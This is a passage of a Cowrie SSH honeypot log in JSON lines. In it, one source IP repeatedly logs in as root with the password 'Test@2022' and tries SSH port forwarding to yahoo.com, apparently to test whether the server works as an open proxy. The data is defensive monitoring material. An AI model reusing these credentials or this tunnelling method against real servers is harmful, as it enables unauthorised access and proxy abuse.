57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.315951Z","src_ip":"213.209.150.239","session":"ee8265e0e4f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.551386Z","src_ip":"213.209.150.239","session":"ee8265e0e4f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":3636,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:3636","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.599641Z","session":"ee8265e0e4f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.647034Z","src_ip":"213.209.150.239","session":"ee8265e0e4f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24855,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24855","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.781578Z","session":"ee8265e0e4f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.829118Z","src_ip":"213.209.150.239","session":"ee8265e0e4f0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.877198Z","src_ip":"213.209.150.239","session":"ee8265e0e4f0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51217,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab73137a6bb","protocol":"ssh","message":"New connection: 213.209.150.239:51217 (1.2.3.4:22) [session: 7ab73137a6bb]","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.932701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.942935Z","src_ip":"213.209.150.239","session":"7ab73137a6bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:05.989897Z","src_ip":"213.209.150.239","session":"7ab73137a6bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.272115Z","src_ip":"213.209.150.239","session":"7ab73137a6bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15372,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15372","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.329668Z","session":"7ab73137a6bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.386491Z","src_ip":"213.209.150.239","session":"7ab73137a6bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27602,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27602","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.543094Z","session":"7ab73137a6bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.599894Z","src_ip":"213.209.150.239","session":"7ab73137a6bb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.659146Z","src_ip":"213.209.150.239","session":"7ab73137a6bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51287,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7b1ac057e72","protocol":"ssh","message":"New connection: 213.209.150.239:51287 (1.2.3.4:22) [session: e7b1ac057e72]","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.714443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.724484Z","src_ip":"213.209.150.239","session":"e7b1ac057e72"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:06.771406Z","src_ip":"213.209.150.239","session":"e7b1ac057e72"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.053041Z","src_ip":"213.209.150.239","session":"e7b1ac057e72"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10469,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10469","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.110497Z","session":"e7b1ac057e72"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.167243Z","src_ip":"213.209.150.239","session":"e7b1ac057e72"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":17124,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17124","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.323280Z","session":"e7b1ac057e72"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.380199Z","src_ip":"213.209.150.239","session":"e7b1ac057e72"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.438050Z","src_ip":"213.209.150.239","session":"e7b1ac057e72"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51385,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b5df48c861","protocol":"ssh","message":"New connection: 213.209.150.239:51385 (1.2.3.4:22) [session: 99b5df48c861]","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.484278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.485458Z","src_ip":"213.209.150.239","session":"99b5df48c861"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.532578Z","src_ip":"213.209.150.239","session":"99b5df48c861"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.767495Z","src_ip":"213.209.150.239","session":"99b5df48c861"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":5217,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5217","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.816226Z","session":"99b5df48c861"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:07.863348Z","src_ip":"213.209.150.239","session":"99b5df48c861"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":27161,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27161","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.001521Z","session":"99b5df48c861"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.048978Z","src_ip":"213.209.150.239","session":"99b5df48c861"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.096785Z","src_ip":"213.209.150.239","session":"99b5df48c861"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51447,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2282a553c00","protocol":"ssh","message":"New connection: 213.209.150.239:51447 (1.2.3.4:22) [session: c2282a553c00]","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.152526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.153674Z","src_ip":"213.209.150.239","session":"c2282a553c00"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.210610Z","src_ip":"213.209.150.239","session":"c2282a553c00"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.493710Z","src_ip":"213.209.150.239","session":"c2282a553c00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8406,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8406","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.551401Z","session":"c2282a553c00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.608123Z","src_ip":"213.209.150.239","session":"c2282a553c00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6036,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6036","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.763100Z","session":"c2282a553c00"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.819782Z","src_ip":"213.209.150.239","session":"c2282a553c00"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.877451Z","src_ip":"213.209.150.239","session":"c2282a553c00"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51530,"dst_ip":"1.2.3.4","dst_port":22,"session":"34d9dc4e6c2c","protocol":"ssh","message":"New connection: 213.209.150.239:51530 (1.2.3.4:22) [session: 34d9dc4e6c2c]","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.923477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.933676Z","src_ip":"213.209.150.239","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:08.970836Z","src_ip":"213.209.150.239","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.205613Z","src_ip":"213.209.150.239","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16289,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16289","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.253657Z","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.300985Z","src_ip":"213.209.150.239","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":8900,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8900","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.445545Z","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.492687Z","src_ip":"213.209.150.239","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.541012Z","src_ip":"213.209.150.239","session":"34d9dc4e6c2c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51600,"dst_ip":"1.2.3.4","dst_port":22,"session":"edc0397a0b95","protocol":"ssh","message":"New connection: 213.209.150.239:51600 (1.2.3.4:22) [session: edc0397a0b95]","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.596744Z"}
